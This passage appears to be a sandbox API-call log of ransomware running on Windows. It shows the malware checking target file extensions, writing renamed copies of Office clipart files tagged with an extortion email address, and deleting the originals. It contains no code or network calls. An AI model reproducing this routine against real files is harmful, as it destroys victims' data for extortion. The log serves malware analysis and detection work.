[0198.782] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 68 [0198.782] lstrlenW (lpString=".1cd") returned 4 [0198.782] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.782] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 68 [0198.782] lstrlenW (lpString=".jpg") returned 4 [0198.782] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.782] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.782] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.783] GetLastError () returned 0x0 [0198.783] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xd90, lpOverlapped=0x0) returned 1 [0198.784] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xda0, lpOverlapped=0x0) returned 1 [0198.785] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.785] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.785] SetEndOfFile (hFile=0x340) returned 1 [0198.785] CloseHandle (hObject=0x340) returned 1 [0198.786] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.786] SetEndOfFile (hFile=0x3a0) returned 1 [0198.786] CloseHandle (hObject=0x3a0) returned 1 [0198.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.787] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf")) returned 1 [0198.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 68 [0198.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 68 [0198.788] lstrlenW (lpString=".doc") returned 4 [0198.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.788] lstrlenW (lpString=".docx") returned 5 [0198.788] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0198.788] lstrlenW (lpString=".pdf") returned 4 [0198.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.788] lstrlenW (lpString=".xls") returned 4 [0198.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.788] lstrlenW (lpString=".xlsx") returned 5 [0198.788] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0198.788] lstrlenW (lpString=".ppt") returned 4 [0198.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 68 [0198.789] lstrlenW (lpString=".zip") returned 4 [0198.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.789] lstrlenW (lpString=".rar") returned 4 [0198.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.789] lstrlenW (lpString=".bz2") returned 4 [0198.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.789] lstrlenW (lpString=".7z") returned 3 [0198.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 68 [0198.789] lstrlenW (lpString=".dbf") returned 4 [0198.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 68 [0198.789] lstrlenW (lpString=".1cd") returned 4 [0198.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 68 [0198.789] lstrlenW (lpString=".jpg") returned 4 [0198.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.789] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.789] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.790] GetLastError () returned 0x0 [0198.790] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1388, lpOverlapped=0x0) returned 1 [0198.791] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1390, lpOverlapped=0x0) returned 1 [0198.792] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.792] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.792] SetEndOfFile (hFile=0x340) returned 1 [0198.792] CloseHandle (hObject=0x340) returned 1 [0198.792] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.793] SetEndOfFile (hFile=0x3a0) returned 1 [0198.793] CloseHandle (hObject=0x3a0) returned 1 [0198.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.793] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf")) returned 1 [0198.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 68 [0198.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 68 [0198.794] lstrlenW (lpString=".doc") returned 4 [0198.794] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.794] lstrlenW (lpString=".docx") returned 5 [0198.794] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0198.794] lstrlenW (lpString=".pdf") returned 4 [0198.794] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.794] lstrlenW (lpString=".xls") returned 4 [0198.794] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.794] lstrlenW (lpString=".xlsx") returned 5 [0198.794] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0198.794] lstrlenW (lpString=".ppt") returned 4 [0198.794] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 68 [0198.795] lstrlenW (lpString=".zip") returned 4 [0198.795] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.795] lstrlenW (lpString=".rar") returned 4 [0198.795] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.795] lstrlenW (lpString=".bz2") returned 4 [0198.795] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.795] lstrlenW (lpString=".7z") returned 3 [0198.795] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 68 [0198.795] lstrlenW (lpString=".dbf") returned 4 [0198.795] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 68 [0198.795] lstrlenW (lpString=".1cd") returned 4 [0198.795] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF") returned 68 [0198.795] lstrlenW (lpString=".jpg") returned 4 [0198.795] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.795] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.795] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.796] GetLastError () returned 0x0 [0198.796] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x29dc, lpOverlapped=0x0) returned 1 [0198.797] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x29e0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x29e0, lpOverlapped=0x0) returned 1 [0198.798] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.798] WriteFile (in: hFile=0x340, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.798] SetEndOfFile (hFile=0x340) returned 1 [0198.798] CloseHandle (hObject=0x340) returned 1 [0198.799] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.799] SetEndOfFile (hFile=0x3a0) returned 1 [0198.799] CloseHandle (hObject=0x3a0) returned 1 [0198.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.800] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf")) returned 1 [0199.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 68 [0199.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 68 [0199.106] lstrlenW (lpString=".doc") returned 4 [0199.106] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.106] lstrlenW (lpString=".docx") returned 5 [0199.106] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0199.106] lstrlenW (lpString=".pdf") returned 4 [0199.106] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.106] lstrlenW (lpString=".xls") returned 4 [0199.106] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.106] lstrlenW (lpString=".xlsx") returned 5 [0199.106] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0199.106] lstrlenW (lpString=".ppt") returned 4 [0199.106] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 68 [0199.106] lstrlenW (lpString=".zip") returned 4 [0199.107] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.107] lstrlenW (lpString=".rar") returned 4 [0199.107] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.107] lstrlenW (lpString=".bz2") returned 4 [0199.107] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.107] lstrlenW (lpString=".7z") returned 3 [0199.107] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 68 [0199.107] lstrlenW (lpString=".dbf") returned 4 [0199.107] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 68 [0199.107] lstrlenW (lpString=".1cd") returned 4 [0199.107] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF") returned 68 [0199.107] lstrlenW (lpString=".jpg") returned 4 [0199.107] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.107] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.107] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.108] GetLastError () returned 0x0 [0199.108] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1ca4, lpOverlapped=0x0) returned 1 [0199.109] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1cb0, lpOverlapped=0x0) returned 1 [0199.110] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.110] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.110] SetEndOfFile (hFile=0x380) returned 1 [0199.111] CloseHandle (hObject=0x380) returned 1 [0199.111] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.111] SetEndOfFile (hFile=0x3a0) returned 1 [0199.112] CloseHandle (hObject=0x3a0) returned 1 [0199.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf")) returned 1 [0199.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 68 [0199.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 68 [0199.113] lstrlenW (lpString=".doc") returned 4 [0199.113] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString=".docx") returned 5 [0199.113] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0199.113] lstrlenW (lpString=".pdf") returned 4 [0199.113] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString=".xls") returned 4 [0199.113] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.113] lstrlenW (lpString=".xlsx") returned 5 [0199.113] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0199.113] lstrlenW (lpString=".ppt") returned 4 [0199.113] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 68 [0199.113] lstrlenW (lpString=".zip") returned 4 [0199.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.113] lstrlenW (lpString=".rar") returned 4 [0199.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString=".bz2") returned 4 [0199.113] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString=".7z") returned 3 [0199.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 68 [0199.113] lstrlenW (lpString=".dbf") returned 4 [0199.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 68 [0199.113] lstrlenW (lpString=".1cd") returned 4 [0199.113] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF") returned 68 [0199.113] lstrlenW (lpString=".jpg") returned 4 [0199.113] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.114] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.114] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.115] GetLastError () returned 0x0 [0199.115] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x11b6, lpOverlapped=0x0) returned 1 [0199.116] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x11c0, lpOverlapped=0x0) returned 1 [0199.117] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.117] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0199.117] SetEndOfFile (hFile=0x380) returned 1 [0199.117] CloseHandle (hObject=0x380) returned 1 [0199.118] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.118] SetEndOfFile (hFile=0x3a0) returned 1 [0199.118] CloseHandle (hObject=0x3a0) returned 1 [0199.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf")) returned 1 [0199.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 68 [0199.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 68 [0199.120] lstrlenW (lpString=".doc") returned 4 [0199.120] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString=".docx") returned 5 [0199.120] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0199.120] lstrlenW (lpString=".pdf") returned 4 [0199.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString=".xls") returned 4 [0199.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.120] lstrlenW (lpString=".xlsx") returned 5 [0199.120] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0199.120] lstrlenW (lpString=".ppt") returned 4 [0199.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 68 [0199.120] lstrlenW (lpString=".zip") returned 4 [0199.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.120] lstrlenW (lpString=".rar") returned 4 [0199.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString=".bz2") returned 4 [0199.120] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString=".7z") returned 3 [0199.120] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 68 [0199.120] lstrlenW (lpString=".dbf") returned 4 [0199.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 68 [0199.120] lstrlenW (lpString=".1cd") returned 4 [0199.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF") returned 68 [0199.120] lstrlenW (lpString=".jpg") returned 4 [0199.120] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.121] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.121] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0199.122] GetLastError () returned 0x0 [0199.122] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x207a, lpOverlapped=0x0) returned 1 [0199.123] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2080, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2080, lpOverlapped=0x0) 